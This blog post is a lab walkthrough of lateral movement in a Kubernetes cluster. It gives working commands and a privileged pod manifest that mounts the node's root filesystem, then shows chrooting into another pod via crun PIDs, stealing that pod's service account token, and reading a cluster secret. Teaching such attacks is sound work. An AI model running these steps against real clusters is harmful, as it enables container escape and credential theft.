Lateral movement inside a Kubernetes Cluster

If you haven’t touched the wild wild west of Kubernetes before, I recommend you go take a look at my other blog post, Intro to Kubernetes first.

I think first time I got exposed to the world of Kubernetes hacking was from solving Unobtainium on HackTheBox. Here is a writeup that goes in detail. This blog post aims to demo how you can do even more fun lateral movement inside a cluster with useable commands.

I created a cool™ lab recently to show how my co-workers over at Volkis could hack a cluster. To try this out in that you can spin up using my test cluster scripts, specifically by running this bash script. If you don’t want any spoilers and just want to give it a go, I recommend you click off now.

Okay, well, let’s take a look at how the challenge is laid out:

When we start the challenge, we are dropped into a user (called lowpriv) that has a defined kube config with restricted access to the cluster. This

We also have another pod called something-like-rancher contained in a different namespace, specifically system-manager. This pod also has service account, and within this namespace there is a secret that we want to get access too. So, obviously accounting for the permissions granted by dev-user, we could imagine a flow like this:

Create a bad pod on kubenode01
Gain a shell in the bad pod and escalate to root privileges on kubenode01
Using root access to the node’s container runtime, gain a shell inside the something-like-rancher pod’s container.
Grab the token of the manager service account
Use this token to query the cluster and retrieve the system-manager-configuration secret.

Of course, we’ve made a lot of assumptions here:

We assume that dev-user service account can create pods (we can check this manually using kubectl)
We assume that the dev-user and manager service accounts are actually mounted and assigned to containers
We assume that the manager service account has privileges to grab secrets from the cluster (again, we can check the access of the account using kubectl later)

The command kubectl auth can-i --list will list all the permissions of the current account in the current namespace:

(this is a minified version of the output)

Resources        Resource Names   Verbs
*                []               [*]
*.apps           []               [*]
cronjobs.batch   []               [*]
jobs.batch       []               [*]
*.extensions     []               [*]

In this case we can see that we can perform all verbs on all resources. (This can be seen in the second line of the output).

We can create a simple pod that will run a small bash shell:

apiVersion: v1
kind: Pod
metadata:
  name: mallicious-pod
  labels:
    app: pentest
spec:
  containers:
  - name: mallicious-pod
    image: tatsushid/tinycore
    securityContext:
      privileged: true
      runAsUser: 0
      runAsGroup: 0
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  nodeSelector:
    kubernetes.io/hostname: kubenode01
  volumes:
  - name: noderoot
    ostPath:
      path: /

Runs as root user (this container and some others put the user as non-root)
Mounts the nodes root filesystem at /host
Selects kubenode01 as the particular target (this could be changed to the control plane 💀, I just haven’t done enough research yet to figure out how root access on the control plane could be used to compromise the cluster).

Finding the container root⌗

For those familiar with Docker, unfortunately that won’t help us here. Docker has been deprecated from Kubernetes for a little while now. We are going to have to talk to other container runtimes 🥶. Most clusters use CRI-O, which is actually a high-level container runtime, and can be configured to use other low-level runtimes like runc, crun, gVisor, runv, kata-containers or rkt.

By default, container interfaces such as CRI-O will have custom configurations that place the root directory of the container runtime at different locations. In this instance, running crun list will not show any running containers because the runtime root is incorrect, but we can find the default (or a custom runtime_root dir) by looking at the configuration files:

cd /etc/crio/ && grep -R "runtime_root ="

In this case, the default runtime_root is listed (/run/runc) and no custom runtime root is configured (note that the lines are commented using #):

crio.conf:# runtime_root = "/path/to/the/root"
crio.conf:# runtime_root = "/run/runc"

Knowing this we can now find the running containers’ process id by using the crun command and specifying a different root directory (and also outputting to json and greping for pid):

crun --root /run/runc/ list -f json | grep pid | awk -F': ' '{print substr($2, 1, length($2)-1)}' | grep -v '^0$'

# Or, if jq is on the system
crun --root /run/runc/ list -f json | jq '.[].pid' | grep -v '^0$'

We can now find out what these running processes are by using good old ps:

ps 1069

PID TTY      STAT   TIME COMMAND
1069 ?        Ssl    0:00 /opt/bin/flanneld --ip-masq --kube-subnet-mgr --iface=eth1

This can be kind of cumbersome if there are a lot of containers though, so let’s write a tiny little bash loop:

for i in $(crun --root /run/runc/ list -f json | jq '.[].pid' | grep -v '^0$'); do ps aux | grep $i | grep -v grep; done

This output is minified for the blog post:

root  1857  /usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf...
root  2073  /opt/bin/flanneld --ip-masq --kube-subnet-mgr --iface=eth1
1001  6777  /bin/sh -c -- while true; do echo 'testbox'; sleep 30; done;
1001  6791  /bin/sh -c -- while true; do echo 'servicer'; sleep 30; done;
root  6807  /bin/sh -c -- while true; do sleep 30; done;

Obviously, we don’t really want to target containers used to maintain the cluster (or do we 👀?), we really want to target running services that are outside our namespace, maybe they have secrets or different service account permissions? In this case, we can see a container running an pretend application called servicer. We can also see testbox, which was inside our original namespace.

So, let’s pivot into servicer and see what’s in there:

chroot /proc/6791/root/

We can double check to see if we are inside the container:

$ ps
PID   USER     COMMAND
    1 tc       /bin/sh -c -- while true; do echo 'servicer'; sleep 30; done;
   15 tc       sleep 30

Looking good! Let’s see the environment variables of the 1 process:

$ cat /proc/1/environ | sed 's/$/\n/'

This will output:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
TERM=xterm
HOSTNAME=something-like-rancher
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_PORT=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_PORT=443
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_SERVICE_PORT=443
HOME=/home/tc

Nothing too interesting in here, so let’s circle back around to the mounted secrets:

$ ls /var/run/secrets/kubernetes.io/
serviceaccount

There is a service account, these are automatically mounted and can be pivoted off as talked about in my other blog post. Let’s follow the process from there:

export SA=/proc/6791/root/var/run/secrets/kubernetes.io/serviceaccount

export NAMESPACE=$(cat ${SA}/namespace)
export TOKEN=$(cat ${SA}/token)
export CA="${SA}/ca.crt"

kubectl \
  get pods
  --token ${TOKEN} \
  --certificate-authority ${CA} \
  --namespace ${NAMESPACE} \
  --server 'https://10.96.0.1:443'

You might notice that I pulled the server param seemingly out of nowhere, but in reality, we can look at the environment variables above to find it :).

From here, I’m going to remove all the extra params (--token, --server etc.) for brevity.

$ kubectl get pods -n ${NAMEPSACE}
NAME                     READY   STATUS    RESTARTS   AGE
something-like-rancher   1/1     Running   0          108m

Let’s see what resources we can get in this namespace (using some disgusting bashy-ness):

kubectl api-resources \
  --verbs=list -o name --token $TOKEN \
  --certificate-authority $CA \
  --namespace kube-default \
  -s https://10.96.0.1:443 |\
  xargs -n 1 kubectl get -n $NAMESPACE \
  --ignore-not-found -o name --token $TOKEN \
  --certificate-authority $CA --namespace $NAMESPACE \
  -s 'https://10.96.0.1:443' 2>/dev/null

Just a brief walkthrough of what this bash command does:

We get a list of all the different types of resources defined inside the kubernetes cluster
We pipe these resources into xargs, which will run a command for each line of output
xargs calls something like kubectl get {ARG} -o name, which outputs the name of the resource.
Any errors we pipe into /dev/null

This gives us some nice output:

configmap/kube-root-ca.crt
pod/something-like-rancher
secret/system-manager-configuration
serviceaccount/default
serviceaccount/manager

Obviously, the defined secret here is interesting:

$ kubectl get secret system-manager-configuration --namespace $NAMESPACE -o jsonpath='{.data}'
{"password":"S2luZyDwn5GRCg==","username":"R29vZEpvYgo="}

We can then decode these values:

username: goodjob password: King 👑

Take-Aways⌗

Here are the main goals of this blog post:

Introduce the world to the world of wonders that is Kubernetes
Talk about the real-world attacks and scenarios
Provide actionable examples of how an attacker can pivot around a cluster
Provide useful bash-isms to simply and accelerate the process of exploiting a cluster